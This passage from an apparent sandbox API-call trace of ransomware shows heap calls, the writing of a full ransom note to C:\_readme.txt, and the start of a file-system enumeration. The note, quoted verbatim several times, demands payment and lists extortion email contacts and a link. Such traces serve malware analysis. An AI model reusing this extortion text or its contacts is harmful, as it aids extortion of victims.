0x2e765d0 [0183.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.347] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.347] PathFindFileNameW (pszPath="") returned="" [0183.347] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.348] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0183.348] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0183.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.348] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x2e902a8 [0183.363] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0183.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0183.363] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0183.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e90ab8 [0183.365] lstrcpyW (in: lpString1=0x2e90ab8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.365] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0183.365] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0183.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2e987c0 [0183.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85c) returned 0x2e99088 [0183.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e99088, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 1117 [0183.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e998f0 [0183.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e99088 | out: hHeap=0x620000) returned 1 [0183.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e987c0 | out: hHeap=0x620000) returned 1 [0183.368] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 1116 [0183.368] WriteFile (in: hFile=0x564, lpBuffer=0x2e998f0*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x312fb64, lpOverlapped=0x0 | out: lpBuffer=0x2e998f0*, lpNumberOfBytesWritten=0x312fb64*=0x45c, lpOverlapped=0x0) returned 1 [0183.369] CloseHandle (hObject=0x564) returned 1 [0183.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e998f0 | out: hHeap=0x620000) returned 1 [0183.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90ab8 | out: hHeap=0x620000) returned 1 [0183.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.376] FindFirstFileW (in: lpFileName="C:\\*" (normalized: "c:\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7f4e9560, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f4e9560, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2cfe100 [0183.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0183.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0183.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83700 [0183.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0183.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0183.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0183.378] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0183.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83778 [0183.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0183.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0183.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0183.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: 